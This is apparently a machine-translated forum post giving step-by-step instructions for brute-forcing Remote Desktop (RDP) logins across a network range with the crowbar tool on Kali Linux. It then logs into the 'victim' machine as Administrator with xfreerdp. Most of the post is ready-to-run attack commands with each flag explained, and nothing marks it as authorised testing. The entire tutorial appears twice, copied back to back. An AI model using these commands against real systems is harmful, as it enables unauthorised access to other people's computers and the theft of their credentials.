iseeyou
02-01-2018, 11:49 AM
The script of crowbar is written in the python programming language.
We will install him on ours the PC under control of Kali Linux.
We open the terminal and we enter command for installation of the utility for connection to a remote desktop:
apt-get install freerdp-x11
installation of this utility is necessary for the correct work of a script, and also for further connection to a remote desktop.
To check operability of the installed utility, we will enter team of request of the version of the utility:
xfreerdp --version
the utility has reacted to inquiry adequately - it says that the utility is installed correctly, without this utility the script won't work.
Now we pass to installation of a script, by means of the utility of git we clone a script to ourselves on the computer:
git clone https://github.com/galkan/crowbar
The folder with a script was copied in the root folder (the house folder), we pass into it with command:
cd crowbar/
and to the make executed the crowbar.py file by means of command:
/crowbar# chmod +x crowbar.py
now we will check work of a script having requested the help:
/crowbar# python crowbar.py --help
this team will show us all information on work with a script that speaks about his working capacity.
Now files with logins and passwords on which we will make the attack will be necessary for us, the location of files doesn't matter, but it is more convenient when they lie in the folder with a script, we will copy our files in the folder with a script.
On it our preparations are finished.
We pass directly to the attack
/crowbar# python crowbar.py -b rdp -U login.txt -C pass.txt -s 192.168.0-15.0-255 -o good.txt -n 100 -t 500 -v -d
-b rdp the protocol for brute force
-U login.txt we specify the file with logins (it is possible to write -u and to write the concrete login if he is known to us)
-C pass.txt we specify the file with passwords
-s we specify a host or range of hosts, as in my example (it is possible to use a key -S to attack hosts from the file)
-o good.txt we specify the file in which results of the attack will remain
-n 100 we specify quantity of streams
-t 500 we specify a timeout
-v we specify visualization that process was displayed in a terminal window
-d we point check of ports to openness before the attack
We start command and we can go to smoke, everything depends on the number of logins and passwords in your files, perhaps it will drag on at many o'clock and even days.
When the program finishes the work, it will be possible to look at results in the file in this case good.txt there you will find successful selection if such I have taken place, also in a terminal window if to thumb through scanning the successful option will be highlighted in green color.
And now we are connected having entered the following command:
xfreerdp -k en-us -a 32 -x l -z -u Administrator -g 800x600 --sec rdp --plugin cliprdr 192.168.2.12
after a key -u we specify the picked-up login
cliprdr 192.168.2.12 and IP from crack host.
In the opened window of a remote desktop the user name which you have specified will be entered, it will be necessary to enter the password which you have received also the computer of the victim yours:chuncky:.
I hope to you it will be useful.
If this post is demanded that I will acquaint you with the utility which in 80% of cases allows to learn the login on RDP without Brute Forsing of a swagger in only a few seconds.
We will install him on ours the PC under control of Kali Linux.
We open the terminal and we enter command for installation of the utility for connection to a remote desktop:
apt-get install freerdp-x11
installation of this utility is necessary for the correct work of a script, and also for further connection to a remote desktop.
To check operability of the installed utility, we will enter team of request of the version of the utility:
xfreerdp --version
the utility has reacted to inquiry adequately - it says that the utility is installed correctly, without this utility the script won't work.
Now we pass to installation of a script, by means of the utility of git we clone a script to ourselves on the computer:
git clone https://github.com/galkan/crowbar
The folder with a script was copied in the root folder (the house folder), we pass into it with command:
cd crowbar/
and to the make executed the crowbar.py file by means of command:
/crowbar# chmod +x crowbar.py
now we will check work of a script having requested the help:
/crowbar# python crowbar.py --help
this team will show us all information on work with a script that speaks about his working capacity.
Now files with logins and passwords on which we will make the attack will be necessary for us, the location of files doesn't matter, but it is more convenient when they lie in the folder with a script, we will copy our files in the folder with a script.
On it our preparations are finished.
We pass directly to the attack
/crowbar# python crowbar.py -b rdp -U login.txt -C pass.txt -s 192.168.0-15.0-255 -o good.txt -n 100 -t 500 -v -d
-b rdp the protocol for brute force
-U login.txt we specify the file with logins (it is possible to write -u and to write the concrete login if he is known to us)
-C pass.txt we specify the file with passwords
-s we specify a host or range of hosts, as in my example (it is possible to use a key -S to attack hosts from the file)
-o good.txt we specify the file in which results of the attack will remain
-n 100 we specify quantity of streams
-t 500 we specify a timeout
-v we specify visualization that process was displayed in a terminal window
-d we point check of ports to openness before the attack
We start command and we can go to smoke, everything depends on the number of logins and passwords in your files, perhaps it will drag on at many o'clock and even days.
When the program finishes the work, it will be possible to look at results in the file in this case good.txt there you will find successful selection if such I have taken place, also in a terminal window if to thumb through scanning the successful option will be highlighted in green color.
And now we are connected having entered the following command:
xfreerdp -k en-us -a 32 -x l -z -u Administrator -g 800x600 --sec rdp --plugin cliprdr 192.168.2.12
after a key -u we specify the picked-up login
cliprdr 192.168.2.12 and IP from crack host.
In the opened window of a remote desktop the user name which you have specified will be entered, it will be necessary to enter the password which you have received also the computer of the victim yours:chuncky:.
I hope to you it will be useful.
If this post is demanded that I will acquaint you with the utility which in 80% of cases allows to learn the login on RDP without Brute Forsing of a swagger in only a few seconds.